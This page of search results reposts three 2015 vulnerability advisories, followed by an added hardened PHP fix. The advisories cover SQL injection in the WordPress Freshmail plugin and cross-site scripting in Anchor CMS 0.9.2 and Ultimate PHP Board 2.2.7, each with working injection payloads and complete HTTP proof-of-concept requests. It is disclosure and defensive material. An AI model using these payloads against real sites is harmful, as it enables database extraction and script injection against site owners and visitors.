Showing results for tags 'content-disposition'.

Found 3 results

  1. ------------------------
     ISSUE 1:

     # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
     # Google Dork: N/A
     # Date: 05/05/2015
     # Exploit Author: Felipe Molina de la Torre (@felmoltor)
     # Vendor Homepage: http://freshmail.com/
     # Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
     # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
     # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
     # CVE : N/A
     # Category: webapps

     1. Summary
     ------------------

     Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them.

     There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection is located in the attribute "id" of the inserted shortcode [FM_form id="N"]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query.

     A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection.

     2. Vulnerability timeline
     ----------------------------------

     - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter.
     - 05/05/2015: Send the details by mail to developer.
     - 05/05/2015: Response from the developer.
     - 06/05/2015: Fixed version in 1.6

     3. Vulnerable code
     ---------------------------

     Vulnerable File: include/shortcode.php, lines 27 and 120:

         Line 19: function fm_form_func($atts)
         [...]
         Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
         [...]
         Line 120: add_shortcode('FM_form', 'fm_form_func');

     3. Proof of concept
     ---------------------------

     1. As collaborator, start a new post.
     2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
     3. Click preview.
     4. If the form is shown, the statement is true, if not, false.

         POST /wp-admin/post.php HTTP/1.1
         Host: <web>
         Content-Length: 3979
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
         Origin: <web>
         User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL
         Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
         Accept-Encoding: gzip, deflate
         Accept-Language: en-US,en;q=0.8,es;q=0.6
         Cookie: wordpress_f305[...]

         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="_wpnonce"

         0a75a3666b
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="_wp_http_referer"

         /wp-admin/post.php?post=69&action=edit&message=8
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="user_ID"

         4
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="action"

         editpost
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="originalaction"

         editpost
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="post_author"

         4
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="post_type"

         post
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="original_post_status"

         pending
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="referredby"

         http://<web>/wp-admin/post.php?post=69&action=edit&message=8
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="_wp_original_http_referer"

         http://<web>/wp-admin/post.php?post=69&action=edit&message=8
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="post_ID"

         69
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="meta-box-order-nonce"

         f8aa04e508
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="closedpostboxesnonce"

         ebf65a43ed
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="post_title"

         Testing SQLi in shortcode
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="samplepermalinknonce"

         e753a2d8f2
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="content"

         [FM_form id='1" and substr(user(),1,1)="b]
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="wp-preview"

         dopreview
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="original_publish"

         Submit for Review
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="post_format"

         0
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="post_category[]"

         0
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="post_category[]"

         1
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="tax_input[post_tag]"


         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="newtag[post_tag]"


         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="excerpt"


         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="trackback_url"


         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="metakeyselect"

         #NONE#
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="metakeyinput"


         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="metavalue"


         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="_ajax_nonce-add-meta"

         6a13a5a808
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="advanced_view"

         1
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="comment_status"

         open
         ------WebKitFormBoundary384PE6lRgBcOibkL
         Content-Disposition: form-data; name="ping_status"

         open
         ------WebKitFormBoundary384PE6lRgBcOibkL--

     5. Solution
     ---------------

     Update to version 1.6

     ------------------------
     ISSUE 2:

     # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
     # Google Dork: N/A
     # Date: 05/05/2015
     # Exploit Author: Felipe Molina de la Torre (@felmoltor)
     # Vendor Homepage: http://freshmail.com/
     # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
     # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
     # CVE : N/A
     # Category: webapps

     1. Summary
     ------------------

     Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them.

     There is an unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter fm_form_id.

     2. Vulnerability timeline
     ----------------------------------

     - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter.
     - 05/05/2015: Send the details by mail to developer.
     - 05/05/2015: Response from the developer.
     - 06/05/2015: Fixed version in 1.6

     3. Vulnerable code
     ---------------------------

     Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50

         [...]
         Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
         Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
         [...]
         Line 44: $result = $_POST;
         [...]
         Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id="'.$result['fm_form_id'].'";');
         [...]

     3. Proof of concept
     ---------------------------

         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: <web>
         X-Requested-With: XMLHttpRequest
         [...]
         Cookie: wordpress_f30[...]

         form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and "a"="a&action=fm_form&fm_form_referer=%2F

     4. Explanation
     ---------------------

     A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id="1" and the JSON message received will be similar to:

         {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Your sign up request was successful! Please check your email inbox."}

     The second time he tries to do the same with the same email the message returned will be:

         {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Given email address is already subscribed, thank you!"}

     If we insert 1" and substr(user(),1,1)="a we'll receive either the same message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a".

     5. Solution
     ---------------

     Update to version 1.6

     Source
  2. #Affected Vendor: http://anchorcms.com/
     #Date: 23/03/2015
     #Discovered by: JoeV
     #Type of vulnerability: XSS
     #Tested on: Windows 7
     #Version: 0.9.2
     #Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting attack.

     Proof of Concept (PoC):
     ---------------------------

     *XSS*
     ---

         POST /anchor/index.php/admin/pages/add HTTP/1.1
         Host: localhost
         Proxy-Connection: keep-alive
         Content-Length: 1003
         Cache-Control: max-age=0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
         Origin: http://localhost
         User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4w4M5e7r1tBwc2wp
         Referer: http://localhost/anchor/index.php/admin/pages/add
         Accept-Encoding: gzip, deflate
         Accept-Language: en-US,en;q=0.8
         Cookie: anchor-install-timezone=-330; anchorcms-install=kIlKh79lcE6sWxZBwoSMI2eN4LuqpHgK; anchorcms-install_payload=[...]; anchorcms=u8h0s9Vjh9LUAM56y7TDWBFolw8tJxxC

         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="token"

         286db1269c0e304c7e435bf10251f950
         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="title"

         <img src="blah.jpg" onerror="alert('XSS')"/>
         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="redirect"


         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="content"

         <img src="blah.jpg" onerror="alert('XSS')"/>
         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="name"

         <img src="blah.jpg" onerror="alert('XSS')"/>
         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="slug"

         <img src="blah.jpg" onerror="alert('XSS')"/>
         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="status"

         published
         ------WebKitFormBoundary4w4M5e7r1tBwc2wp
         Content-Disposition: form-data; name="parent"

         1
         ------WebKitFormBoundary4w4M5e7r1tBwc2wp--

     --
     Regards,
     *Joel V*

     Source
  3. Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting

     Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability.

     # Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability
     # CVE : CVE-2015-2217
     # Date : 4 March 2015
     # Exploit Author : CWH Underground
     # Discovered By : ZeQ3uL
     # Site : www.2600.in.th
     # Vendor Homepage : http://www.myupb.com
     # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip
     # Version : 2.2.7

     ####################
     SOFTWARE DESCRIPTION
     ####################

     Ultimate PHP Board is completely text based, making it easy for anybody who has access to PHP to run a message board of their own without the need for MySQL.

     ####################################
     DESCRIPTION FOR CROSS SITE SCRIPTING
     ####################################

     myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. myUPB 2.2.7 is vulnerable; other versions may also be affected.

     ####################
     VULNERABILITY DETAIL
     ####################

     1. Reflect Cross Site Scripting (search.php)

     POC:

         /search.php?q='><script>alert(1)</script>

     2. Stored Cross Site Scripting (profile.php)

     POC:

         POST /upb/profile.php HTTP/1.1
         Host: localhost
         User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
         Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2
         Accept-Encoding: gzip, deflate
         Referer: http://localhost/upb/profile.php
         Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97
         Connection: keep-alive
         Content-Type: multipart/form-data; boundary=---------------------------287611866431947
         Content-Length: 716

         -----------------------------287611866431947
         Content-Disposition: form-data; name="u_email"

         t@t.com
         -----------------------------287611866431947
         Content-Disposition: form-data; name="u_loca"

         th
         -----------------------------287611866431947
         Content-Disposition: form-data; name="avatar"

         images/avatars/chic.jpg'><script>alert("hacked");</script>
         -----------------------------287611866431947
         Content-Disposition: form-data; name="u_site"

         http://
         -----------------------------287611866431947
         Content-Disposition: form-data; name="u_timezone"

         0
         -----------------------------287611866431947
         Content-Disposition: form-data; name="u_edit"

         Submit
         -----------------------------287611866431947--

     Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2

     Source
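
For result 1 (the Freshmail advisories): both quoted lookups build the query by concatenating `$atts['id']` or `$_POST['fm_form_id']` into the SQL string. The following is an added example, not the vendor's 1.6 patch and not code from the post, showing the same two lookups with strict integer validation and `$wpdb->prepare()`. The function names ending in `_hardened` and the placeholder output are assumptions; the table and column names are the ones quoted in the advisory.

```php
<?php
// Added example, not the Freshmail 1.6 patch. Names ending in _hardened are
// hypothetical; table and column names are the ones quoted in the advisory.

// Shared lookup: accept only a plain decimal id, then bind it with %d so the
// value can never change the structure of the SQL statement.
function fm_get_form_row_hardened($raw_id) {
    global $wpdb;
    $raw_id = is_scalar($raw_id) ? trim((string) $raw_id) : '';
    if (!ctype_digit($raw_id)) {
        return null; // rejects quoted or non-numeric ids and empty input
    }
    return $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}fm_forms WHERE form_id = %d",
            (int) $raw_id
        )
    );
}

// Shortcode path (include/shortcode.php in the advisory).
function fm_form_func_hardened($atts) {
    $atts = shortcode_atts(array('id' => ''), $atts, 'FM_form');
    $form = fm_get_form_row_hardened($atts['id']);
    if ($form === null) {
        return ''; // malformed or unknown id renders nothing
    }
    // Placeholder output; the plugin's real form markup is not shown on the page.
    return '<div class="fm-form" data-form-id="' . esc_attr($form->form_id) . '"></div>';
}

// AJAX path (include/wp_ajax_fm_form.php), reachable without login via nopriv.
function fm_form_ajax_func_hardened() {
    $raw_id = isset($_POST['fm_form_id']) ? wp_unslash($_POST['fm_form_id']) : '';
    $form = fm_get_form_row_hardened($raw_id);
    if ($form === null) {
        wp_send_json_error(array('message' => 'Invalid form id'), 400);
    }
    // The plugin's subscription handling would continue here.
    wp_send_json_success(array('fm_form_id' => (int) $form->form_id));
}
```

Because a malformed id is rejected before any query runs, the response no longer varies with an injected condition, which removes the true/false signal both advisories describe.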